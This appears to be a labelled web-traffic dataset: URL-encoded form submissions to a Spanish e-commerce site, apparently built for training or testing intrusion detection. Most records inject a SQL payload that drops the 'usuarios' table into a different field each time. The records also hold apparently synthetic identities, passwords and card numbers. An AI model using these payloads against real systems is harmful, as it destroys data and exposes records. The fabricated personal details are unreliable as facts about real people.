id=2 nombre=Jam%F3n+Ib%E9rico precio=85 cantidad=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=entrar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 login=jeanes pwd=d%F3712 remember=on 
modo=registro login=pye password=59rola9o nombre=Hermenegilda apellidos=Lunar+De+Broy email=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 dni=39171878A direccion=Pla%E7a+Rectoria+17+8%3FA ciudad=Al%E1jar cp=27118 provincia=Salamanca ntc=5074100981550289 
B2=Vaciar+carrito%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=sawyers password=encUmb2ad3%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 nombre=Max apellidos=Sj%F6strand+Ampurias email=tamburi%40hispadis.ar dni=30293636Z direccion=C%2F+Virgen+De+Las+Angustias+122+4%3FA ciudad=Fuentespina cp=48220 provincia=Asturias ntc=8898020239162472 
B2=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=linni password=892444a9aci8 nombre=Rosario apellidos=Bagudanc+Robles email=haumann%40maxiwagen.tj dni=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 direccion=C%2F+Santa+Beatriz+104%2C+8D ciudad=Mingorr%EDa cp=42173 provincia=Palencia ntc=8723970834822268 
modo=registro login=dido password=enmarch3tar nombre=Bertilda apellidos=Deverdun email=low.feliciano%40azkara.sj dni=19110618X direccion=Prolongacion+Algeciras+169%2C+ ciudad=Navarredonda+de+Gredos cp=18418 provincia=Navarra ntc=1628195660765454 
B2=Vaciar+carrito%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
B2=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=2 nombre=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=100 cantidad=97 
B2=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=price password=enlucimiento nombre=Roldan apellidos=Kisines+Selvas email=sverdlin%40cortinasartesol.gl dni=57845890Q direccion=Muelle+Ca%F1onero+Dato%2C+S%2FN+6-G ciudad=Luisiana%2C+La%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 cp=10811 provincia=Palencia ntc=1813562312950494 
id=2 nombre=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=85 cantidad=18 
modo=registro login=bennet password=%2496c5sa nombre=Sid apellidos=Echegoyen+Pazar%E1n email=senghor-golling3%4024htranslations.ht dni=16864786J direccion=Barriada+De+La+Doctora+15+ ciudad=Roa cp=03610%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 provincia=Valladolid ntc=0695001148270797 
id=1%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=entrar login=alvarez pwd=9ec828%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 remember=on 
modo=insertar precio=8588 
modo=registro login=schoen password=cartear nombre=Zaima apellidos=Falgeras+Puerta email=hargitay%40corjet.coop dni=33685330J direccion=Calle+Pedro+Salinas%2C+15%2C+6%3FH%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 ciudad=Bierge cp=44155 provincia=C%E1ceres ntc=2909791700288840 
modo=registro login=essam password=Cat*ER%E9tiCA nombre=Dacil apellidos=Matamala email=sabin.prester%40sandrasummer.jm%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 dni=65185439N direccion=C%2F+Marin+De+Rodezno%2C+178+ ciudad=Gumiel+de+Mercado cp=48140 provincia=Badajoz ntc=9377201272032369 
modo=registro login=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 password=segundar nombre=Armelio apellidos=Gochez email=shankley%40discon.sz dni=25054750E direccion=C%2F+Fuente+Del+Rey%2C+S%2FN%2C+ ciudad=Gavilanes cp=36110 provincia=Salamanca ntc=2607422784974121 
id=1%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 nombre=Jam%F3n+Ib%E9rico precio=100 cantidad=97 
errorMsg=Credenciales+incorrectas%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=pascali password=o73-r1111 nombre=Helidora apellidos=Estrems email=cederlund-sol%40aulahost.qa dni=90572791X direccion=Calle+Urquizu+190+11%3FF ciudad=Santa+Magdalena+de+Pulpis cp=05697 provincia=Zaragoza%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 ntc=3975543619812448 
modo=insertar precio=7744 
B2=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=poyi password=yaro nombre=Gismundo apellidos=Ventall%F3+Tesisteco email=tamburro%40aprendeaestudiar.sj dni=24987514S direccion=Travesia+Diego+De+Almagro%2C+194+ ciudad=Pepino cp=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 provincia=A+Coru%F1a ntc=0040408141488994 
modo=registro login=etoh password=3Nt783E68r nombre=Tatiano apellidos=Renilla+Currius email=sovagovic%40engomera.com.vc dni=57024590T direccion=Vera+De+Bidasoa+115%2C+6%3FC ciudad=Lizo%E1in cp=10520 provincia=Zamora ntc=0723351625880614 
B2=Vaciar+carrito%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=jozef password=ve9dErse nombre=Tahiel apellidos=Ortiz+Narvarte email=lemontier%40viajesnacionales.kp dni=70721027Y direccion=Calle+Virgen+De+La+Hoz%2C+123+4-B ciudad=Borrass%E0%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 cp=44564 provincia=Zaragoza ntc=7002955624204925 
modo=entrar login=mcnair pwd=81cob6r remember=off 
modo=registro login=donnelly password=14a8u19lero nombre=Alessandra apellidos=Ricom%E0+Morato email=gambold%40fok.so dni=66367222D%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 direccion=Calle+Cavallers+63+ ciudad=Tocina cp=03729 provincia=Valladolid ntc=2169388539628734 
errorMsg=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=insertar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=6072 
modo=registro login=swick password=recalzar nombre=Amiel apellidos=Del+Blanco email=ying-carridine%40audiosat.sy dni=55739537A direccion=Jose+Cadierno+186%2C+6F ciudad=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 cp=37621 provincia=Asturias ntc=2320151892972616 
modo=entrar login=zaretsky pwd=725l479zo remember=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=entrar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 login=hua-yuan pwd=*anoria remember=off 
modo=registro login=brittan password=al9mb%2B532 nombre=Onila apellidos=Furcat+Zarco email=greiff%40opticaweb.bu dni=36455660Q direccion=Calle+Nueve+57+%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 ciudad=Utiel cp=01899 provincia=Madrid ntc=0088492463086794 
id=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 nombre=Jam%F3n+Ib%E9rico precio=85 cantidad=21 
id=2%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=1%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=1 nombre=Queso+Manchego%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=39 cantidad=15 
modo=insertar precio=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=entrar login=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 pwd=ensa%F1ada remember=on 
modo=registro login=gilly password=f%2Bemenciar nombre=Octaviano%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 apellidos=Heredia+Wald email=meskill_ferlinghetti%40wormee.pw dni=37936735Y direccion=C%2F+Ginebre%2C+98+ ciudad=Manzanillo cp=33310 provincia=Segovia ntc=1741584206084308 
modo=insertar precio=8588 
modo=registro login=horak password=6eSi74osO nombre=Blas apellidos=Gasca+Noria email=dearden%40hipermadrid.ga dni=01101234V direccion=Avenida+Comunidad+De+Madrid+45%2C+13C ciudad=Villarreal+de+Huerva%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 cp=01170 provincia=Girona ntc=1336518549569700 
modo=registro login=boinnard password=alARgUEZ nombre=Celinda apellidos=Alberti%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 email=moriconi%40x2.com.pro dni=75775962R direccion=Do%F1a+Sancha+16%2C+ ciudad=Montesclaros cp=46230 provincia=Alicante ntc=7573620242761583 
modo=entrar login=sydney pwd=r%24aToNESCA remember=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=3%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 nombre=Vino+Rioja precio=100 cantidad=2 
modo=registro login=bnrecad password=iN%21solUBLe nombre=Aurelio apellidos=Ospina+Soma email=humbert%4024htranslations.name dni=78151636M direccion=Ramat%2C+145+5%3FB ciudad=Barbastro cp=31227 provincia=Valladolid ntc=5175468282615613 
modo=registro login=nettle password=He%D1ir nombre=Rad%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 apellidos=Zalarich+Llufriu email=duarte%40ingenieriadelaconstruccion.vc dni=47182191Z direccion=Baza%2C+55%2C+ ciudad=Blecua+y+Torres cp=43151 provincia=Granada ntc=8375962445368254 
modo=entrar login=hedrich pwd=chonta remember=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=insertar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=6606 
id=3 nombre=Jam%F3n+Ib%E9rico precio=100 cantidad=74 
modo=entrar login=ohio pwd=acerrador%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 remember=off 
modo=registro login=arco password=saxosa nombre=C%E9sar apellidos=Nossa+Vizcarrondo email=kunzer.giorgelli%40cochesautomaticos.kn dni=64841759K direccion=Calle+Higueras%2C+37+ ciudad=Uni%F3n+de+Campos%2C+La cp=20130 provincia=Segovia ntc=1690304707007095 
modo=registro login=raglin password=m783a1er3 nombre=Careli apellidos=Navines email=leclerc6%40soycastellano.gl dni=52316705P%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 direccion=C%2F+Tavernes+Blanques%2C+S%2FN+ ciudad=Rupi%E0 cp=21610 provincia=Guip%FAzcoa ntc=8201185179055303 
modo=entrar login=catlin pwd=v76c088rA remember=off%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=santitor password=EnSimiSmaMIenTO nombre=Lionel apellidos=Ilizaliturri+Corominas email=cubelik%40deltamarina.th dni=71111353E direccion=Rioja+153%2C+ ciudad=Pe%F1amellera+Baja cp=19184%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 provincia=Zamora ntc=0802143307607123 
id=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=insertar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=7191 
id=2 nombre=Queso+Manchego precio=39 cantidad=76 
id=2 nombre=Jam%F3n+Ib%E9rico precio=39%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 cantidad=90 
modo=insertar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=3714 
modo=registro login=vinet%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 password=REl%2BatOr%CDA nombre=Ihor apellidos=Bedos email=sangareau%40faders.com.mil dni=74830064R direccion=Santa+Agueda%2C+S%2FN+5%3FG ciudad=Zarza+de+Mont%E1nchez cp=28191 provincia=Ja%E9n ntc=9112082229252110 
id=2 nombre=Jam%F3n+Ib%E9rico%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=100 cantidad=43 
id=2 nombre=Jam%F3n+Ib%E9rico precio=100 cantidad=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
B2=Vaciar+carrito%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
errorMsg=Credenciales+incorrectas%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=insertar precio=3650%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
errorMsg=Credenciales+incorrectas%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
B2=Vaciar+carrito%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=micgael5 password=dogal nombre=Adelmo apellidos=Jepus+Novas email=cagney%40hiperespa%F1a.et%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 dni=99942317A direccion=Carrer+Sant+Fruitos+1%2C+ ciudad=Riells+i+Viabrea cp=29410 provincia=M%E1laga ntc=4452881808901719 
modo=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=5080 
modo=registro login=seagrove password=pataleo nombre=Grey apellidos=Bollit+Ingl%E9s email=weigel%40lamasguapa.cc dni=15744863Y direccion=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 ciudad=Torno%2C+El cp=18129 provincia=C%E1ceres ntc=2139911097438297 
modo=registro login=youngman password=a018699t0do nombre=Ibar apellidos=Bald%ED+Almansa email=damboise%40automovilesalhambra.co dni=44906096E direccion=Calle+Lima%2C+50+9-D ciudad=Catadau cp=42066 provincia=Madrid ntc=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
errorMsg=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=horatius password=323ant5CIdi3 nombre=Herenia apellidos=Witron+Olivares email=thrush_orhonsay6%40aadsl.no%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 dni=77733072H direccion=Calle+Reina+Regente+47+ ciudad=Sotillo+del+Rinc%F3n cp=09460 provincia=La+Rioja ntc=7365954967805937 
errorMsg=Credenciales+incorrectas%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=1 nombre=Jam%F3n+Ib%E9rico precio=100 cantidad=93 
modo=entrar login=schlacht pwd=43s8a remember=off 
modo=registro login=swidersk password=balarrasa nombre=Yaco apellidos=Moriana+Romanov email=sintes%40noticiasenvivo.mz dni=58500108E direccion=C%2F+Parque+Iguazu+99%2C+ ciudad=Ag%FCimes cp=48940 provincia=Valencia ntc=3622353817159390 
modo=entrar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 login=chaar pwd=pe4ibl171o remember=on 
modo=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 login=chaar pwd=pe4ibl171o remember=on 
modo=insertar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=7701 
B2=Vaciar+carrito%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
id=2 nombre=Jam%F3n+Ib%E9rico precio=100 cantidad=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=entrar login=rizzardi pwd=332G3le8a remember=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=registro login=xi-xian9%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 password=p%3Ferspicacidad nombre=Geraldo apellidos=Pedrol email=chalon%40ingenelec.gl dni=10207822P direccion=C%2F+Paloma%2C+197+ ciudad=Laguna+Dalga cp=47520 provincia=Pontevedra ntc=3590940446144864 
modo=registro login=daesik2 password=24%ED58ca1e581 nombre=Panciano apellidos=Bonitto+Ciraco email=dorsay.thursby%40elrincondelmarmol.pr dni=51834543H%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 direccion=Cabo+De+Agua%2C+S%2FN+ ciudad=Villafranca+de+los+Barros cp=21240 provincia=Ja%E9n ntc=8319637256237029 
modo=registro login=roanne password=dado nombre=Amadis apellidos=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 email=bronchud%40chuecafamily.org dni=86251880V direccion=Calle+Bucarelli+29%2C+ ciudad=Hu%E9neja cp=02270 provincia=Cuenca ntc=2669670300165135 
modo=registro login=detlef6%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 password=garr%F3n nombre=Vigilio apellidos=Alcantara+Campanin email=padamsee%40comodindelhogar.no dni=71599604Y direccion=C%2F+San+Xoan+115+ ciudad=Cigu%F1uela cp=25737 provincia=Palencia ntc=7263738765493624 
modo=registro login=suthers password=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 nombre=Ren%E9e apellidos=Aldeta+Marnetti email=patterson%40arrsys.ke dni=88453156D direccion=Camino+De+Los+Robles%2C+8+ ciudad=Caparroso cp=43694 provincia=Castell%F3n ntc=4200323097821168 
modo=entrar login=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 pwd=caLabrotar remember=on 
B2=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=insertar%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 precio=3532 
errorMsg=%27%3B+DROP+TABLE+usuarios%3B+SELECT+*+FROM+datos+WHERE+nombre+LIKE+%27%25 
modo=insertar precio=1063 
modo=insertar precio=4344 
